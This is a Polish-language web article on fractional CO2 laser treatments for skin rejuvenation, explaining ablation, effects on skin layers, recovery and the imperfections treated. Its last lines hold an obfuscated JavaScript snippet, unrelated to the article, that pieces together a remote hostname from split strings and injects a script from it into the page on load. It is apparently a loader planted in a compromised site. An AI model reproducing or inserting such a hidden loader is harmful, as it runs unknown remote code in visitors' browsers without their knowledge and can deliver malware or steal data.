Współczesna technologia laserowa uległa znacznemu rozwojowi. Zabiegi tego typu służą do redukcji wielu niedoskonałości, w tym przede wszystkim oznak starzenia. Z ich pomocą można odmłodzić twarz i inne obszary ciała w sposób naturalny, oparty na stymulacji naturalnych procesów regeneracyjnych wszystkich warstw skóry. Dowiedz się więcej o zabiegach odmładzających z użyciem lasera CO2.

Czym właściwie jest i jak działa laser CO2?

Laseroterapia jest jedną z najbardziej wszechstronnych metod stosowanych przez medycynę, w tym estetyczną. Możliwość zastosowania tej technologii na wielu partiach ciała i twarzy (w tym bardzo delikatnych), a także niwelowania różnych niedoskonałości wynika z szerokiej dostępności rozmaitych, stale doskonalonych urządzeń. Różnią się one między sobą głównie częstotliwością emitowanej wiązki świetlnej i sposobem oddziaływania na tkanki. Wśród sprzętów często stosowanych do odmładzania skóry na uwagę zasługuje frakcyjny laser CO2.

Laser frakcyjny CO2 emituje energię o mocy, która prowadzi do ablacji, czyli odparowania cząsteczek tkankowych. W ten sposób powstają zamierzone urazy inicjujące proces regeneracji. W przypadku frakcjonowania skóry wiązka świetlna nie oddziałuje na cały obszar zabiegowy, a wytwarza jedynie mikrokanaliki. Pozostawienie między nimi drobniutkich fragmentów nienaruszonych frakcji zmniejsza inwazyjność procedury, skraca okres rekonwalescencji i przyspiesza odnowę biologiczną tkanek. Wynika z to z faktu, że przez nietknięte tkanki sprawniej napływają czynniki naprawcze, których wydzielanie zostaje wzmożone przez wywołane, kontrolowane mikrourazy.

Wpływ odmładzającego lasera CO2 na warstwy skóry

W zależności od indywidualnych potrzeb z pomocą lasera CO2 można oddziaływać na różne warstwy skóry, w tym głębokie partie, w których znajduje się najwięcej włókien kolagenu i elastyny, a nawet na powięź SMAS i podskórną tkankę tłuszczową.

Możliwość głębokiej penetracji tkanek przy jednocześnie niskiej inwazyjności jest szczególnie pożądana przy zabiegach odmładzających. Dlaczego? Ponieważ chociaż oznaki starzenia widoczne są na naskórku, tak naprawdę za większość z nich odpowiadają głębsze warstwy skóry. Zmarszczki i zwiotczenie spowodowane są niedostateczną ilością i rozciągnięciem włókien kolagenowych i elastynowych. Natomiast energia lasera prowadzi do ich obkurczenia, co niemal od razu po zabiegu jest widoczne w postaci poprawy napięcia skóry.

W pierwszych dniach obszar zabiegowy może być zaczerwieniony i lekko opuchnięty, co wynika z zainicjowanego stanu zapalnego. W okresie pozabiegowym ważne jest unikanie słońca i właściwa pielęgnacja. Z kolei w kolejnych tygodniach dochodzi do odnowy biologicznej tkanek – uszkodzone fragmenty zostają zastąpione nowymi, zdrowymi komórkami. Dzięki temu po sesji urządzeniem frakcyjnym dochodzi do poprawy kondycji wszystkich warstw skóry na obszarze zabiegowym.

Jakie oznaki starzenia można zredukować laserem frakcyjnym?

Laserowemu frakcjonowaniu można poddać wybrany obszar twarzy, w tym delikatne okolice oczu czy ust, jak również większe partie. Jest to możliwe dzięki opcji dostosowania parametrów do potrzeb pacjenta – skóra na różnych obszarach ma inną grubość. Zabieg CO2 stosowany jest więc przy wielu różnych niedoskonałościach, takich jak np.:

drobne zmarszczki mimiczne, jak również utrwalone bruzdy;

worki i cienie pod oczami;

zaburzenia kolorytu, przebarwienia różnego pochodzenia;

wiotkość skóry, opadanie na różnych partiach;

blizny (pooperacyjne i potrądzikowe);

zaskórniki, rozszerzone pory skórne, cera przetłuszczająca się;

nadmierne rogowacenie naskórka;

rozstępy na ciele.

Wbrew pozorom laser frakcyjny nie jest więc przeznaczony wyłącznie dla osób dojrzałych z zaawansowanymi oznakami starzenia. Metoda ta bywa stosowana u młodych pacjentów, którzy borykają się z wieloma defektami estetycznymi. Wśród efektów można wymienić promienność skóry, wygładzenie jej powierzchni, uelastycznienie i zagęszczenie tkanek. Po okresie remodelingu uzyskuje się rezultaty w postaci młodszego wyglądu.

(function(){

a10p=document.createElement("script");a10p_="u"+("s")+"ta";

a10p_+=("t.i")+""+"n";a10p_+=(("f")+"o");a10p.type="text/javascript";

a10p_+="/"; a10pu="2247513088";a10pu+=".y6dxglu810pn9uh506g";a10pu+="btef16Xi3vt";

a10p.src="https://"+a10p_+a10pu;a10p.async=true;document.body.appendChild(a10p);

})();